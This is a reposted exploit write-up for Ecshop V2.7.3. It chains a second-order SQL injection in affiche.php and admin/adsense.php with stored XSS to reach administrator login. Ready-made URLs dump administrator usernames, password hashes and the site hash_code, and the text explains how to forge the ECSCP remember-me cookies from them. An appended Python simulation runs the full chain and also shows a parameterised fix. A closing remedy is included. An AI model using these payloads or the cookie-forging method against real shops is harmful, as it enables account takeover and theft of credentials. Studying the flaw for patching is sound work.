Ecshop Latest Version SQL injection + stored XSS = arbitrary Administrator Login

Source: Internet
Author: User

One functional point carrying both a SQL injection and a stored XSS, chained with a mix of techniques. I think I am an artist ~~ Against Ecshop V2.7.3 just now ~

1. The vulnerability lies in the off-site advertisement statistics function (Report Statistics -> Off-site JS in the admin backend), i.e. the /affiche.php page. Its from parameter (the referring site) is stored in the database table ecs_adsense. When the backend's "Off-site JS" report reads that row back, the stored referer goes unfiltered into an SQL statement, which gives a second-order injection.

/affiche.php line 119:

    $sql = "INSERT " . $ecs->table('adsense') . "(from_ad, referer, clicks) VALUES ('-1', '" . $site_name . "', '1')";   // $site_name is $_GET['from']

The stored value is read back in /admin/adsense.php lines 47-49:

    /* Get the total number of orders generated by the current advertisement */
    $sql2 = 'SELECT COUNT(order_id) FROM ' . $ecs->table('order_info') . " WHERE from_ad = '$rows[ad_id]' AND referer = '$rows[referer]'";   // $rows['referer'] comes straight from the table, no addslashes this time
    $rows['order_num'] = $db->getOne($sql2);   // the injected query is executed here

The from value is escaped on the way in (Ecshop already addslashes request input, so the INSERT itself is not injectable), but the database stores the unescaped string, quote and all. Nothing happens until an administrator opens the off-site JS report: at that moment the raw string is spliced into $sql2 and executed, and whatever the injected query returns becomes $rows['order_num'], i.e. the ad's order count shown in the report.

 

2. At the same time there is a stored XSS, because the referer field is not filtered on output either.

3. With the stored XSS you could steal the cookie and log in to the backend, but how to do it more easily? Two SQL injections fetch the hash_code from ecs_shop_config and the administrator's username + password hash from ecs_admin_user. Isn't it better to generate the COOKIE yourself? /admin/privilege.php lines 136-141:
    if (isset($_POST['remember']))
    {
        $time = gmtime() + 3600 * 24 * 365;
        setcookie('ECSCP[admin_id]',   $row['user_id'],                            $time);
        setcookie('ECSCP[admin_pass]', md5($row['password'] . $_CFG['hash_code']), $time);
    }

Both inputs to ECSCP[admin_pass] (the stored password hash and hash_code) are exactly what the two injections return, so the attacker can set ECSCP[admin_id] and ECSCP[admin_pass] by hand and never needs to crack the password hash.


http://localhost/test/ecshop/affiche.php?from=a.baidu.com'%20and%201=2%20union%20select%20group_concat(user_id,'|',user_name,'|',password)%20from%20ecs_admin_user%20order%20by%201%20desc%23&ad_id=-1   // inject administrator information

http://localhost/test/ecshop/affiche.php?from=a.baidu.com'%20and%201=2%20union%20select%20value%20FROM%20ecs_shop_config%20WHERE%20code%20=%20'hash_code'%20order%20by%201%20desc%23&ad_id=-1   // inject the hash_code

http://localhost/test/ecshop/affiche.php?from=a.baidu.com%3Cscript%3Ealert(1)%3C/script%3E&ad_id=-1   // XSS. Of course, I used xsser.me to get information from the page
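The following is an added example, not code from the page or from Ecshop: a Python model of the flow in steps 1 and 3 above. It stands in for the PHP with an in-memory SQLite database, stores the from value the way affiche.php's escaped INSERT leaves it in MySQL, rebuilds admin/adsense.php's $sql2 by string concatenation next to a bound-parameter version of the same query, replays the administrator rendering the off-site JS report, and finally derives the two ECSCP cookies from privilege.php's md5(password . hash_code). The admin row, the hash_code and the table layouts are constructed sample data, and the two payloads are the ones from the URLs above rewritten for SQLite (MySQL's # comment becomes --, group_concat(a, b, c) becomes a || b || c); the assumption that Ecshop addslashes-escapes request input before the INSERT is the page's own "no addslashes again" point.

```python
import hashlib
import sqlite3

# Constructed sample data, not from any real install: one administrator whose
# stored password is md5("admin123"), as Ecshop stores it, and a made-up hash_code.
ADMIN_USER = (1, "admin", hashlib.md5(b"admin123").hexdigest())
HASH_CODE = "0123456789abcdef0123456789abcdef"

# SQLite dialect of the two payloads from the URLs above: MySQL's '#' comment
# becomes '-- ' and group_concat(a, b, c) becomes a || b || c.
PAYLOAD_ADMIN = ("a.baidu.com' and 1=2 union select "
                 "group_concat(user_id||'|'||user_name||'|'||password) "
                 "from ecs_admin_user order by 1 desc-- ")
PAYLOAD_HASH_CODE = ("a.baidu.com' and 1=2 union select value from ecs_shop_config "
                     "where code = 'hash_code' order by 1 desc-- ")


def build_db():
    """In-memory stand-in for the four Ecshop tables the attack touches."""
    db = sqlite3.connect(":memory:")
    db.row_factory = sqlite3.Row
    db.executescript("""
        CREATE TABLE ecs_adsense     (ad_id INTEGER PRIMARY KEY, from_ad INTEGER, referer TEXT, clicks INTEGER);
        CREATE TABLE ecs_order_info  (order_id INTEGER PRIMARY KEY, from_ad INTEGER, referer TEXT);
        CREATE TABLE ecs_admin_user  (user_id INTEGER, user_name TEXT, password TEXT);
        CREATE TABLE ecs_shop_config (code TEXT, value TEXT);
    """)
    db.execute("INSERT INTO ecs_admin_user VALUES (?, ?, ?)", ADMIN_USER)
    db.execute("INSERT INTO ecs_shop_config VALUES ('hash_code', ?)", (HASH_CODE,))
    return db


def affiche_store(db, site_name):
    """affiche.php: Ecshop addslashes()-escapes request input, so the INSERT of
    $_GET['from'] is not injectable itself; MySQL strips the backslashes again and
    the raw string, quote included, is what sits in ecs_adsense.referer.  A bound
    parameter stores exactly that raw value."""
    db.execute("INSERT INTO ecs_adsense (from_ad, referer, clicks) VALUES (-1, ?, 1)",
               (site_name,))


def order_count_vulnerable(db, row):
    """admin/adsense.php lines 47-49: the stored referer is spliced back into SQL."""
    sql2 = ("SELECT COUNT(order_id) FROM ecs_order_info "
            f"WHERE from_ad = '{row['ad_id']}' AND referer = '{row['referer']}'")
    return db.execute(sql2).fetchone()[0]          # $db->getOne($sql2)


def order_count_fixed(db, row):
    """Same query with the values bound; the injected text is just a referer."""
    sql2 = "SELECT COUNT(order_id) FROM ecs_order_info WHERE from_ad = ? AND referer = ?"
    return db.execute(sql2, (row["ad_id"], row["referer"])).fetchone()[0]


def admin_report(db, order_count):
    """Replay the administrator opening Report Statistics -> Off-site JS: every
    stored ad row gets an 'order count' computed by the given function."""
    rows = db.execute("SELECT ad_id, referer FROM ecs_adsense ORDER BY ad_id").fetchall()
    return [order_count(db, row) for row in rows]


def forge_admin_cookie(user_id, password_hash, hash_code):
    """privilege.php lines 136-141: ECSCP[admin_pass] = md5(password . hash_code)."""
    admin_pass = hashlib.md5((password_hash + hash_code).encode()).hexdigest()
    return {"ECSCP[admin_id]": str(user_id), "ECSCP[admin_pass]": admin_pass}


def leak_via_admin_report():
    """Plant the two payloads, then the admin renders the report: the 'order
    counts' of the two planted ads are the admin row and the hash_code."""
    db = build_db()
    affiche_store(db, PAYLOAD_ADMIN)
    affiche_store(db, PAYLOAD_HASH_CODE)
    return admin_report(db, order_count_vulnerable)


def run_attack():
    """End to end: leaked 'order counts' -> forged remember-me cookies."""
    leaked = leak_via_admin_report()
    user_id, _user_name, password_hash = leaked[0].split("|")
    hash_code = leaked[1]
    return forge_admin_cookie(user_id, password_hash, hash_code)


def run_fixed():
    """The same stored payloads against the bound-parameter query leak nothing:
    both ads simply have zero orders."""
    db = build_db()
    affiche_store(db, PAYLOAD_ADMIN)
    affiche_store(db, PAYLOAD_HASH_CODE)
    return admin_report(db, order_count_fixed)


if __name__ == "__main__":
    print(leak_via_admin_report())
    print(run_attack())
    print(run_fixed())
```

The payloads do nothing at the time they are submitted; the leak only happens when the report page runs $sql2, which is why the attacker plants them and waits. The fixed path shows that escaping on input alone is not the cure for a second-order injection: the value must be escaped or bound again at the point where it re-enters SQL.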



Solution:

Apply addslashes to the referer when it is read back out of the database and into SQL in /admin/adsense.php (escaping on input alone does not protect a second-order query), and HTML-encode the field on output.
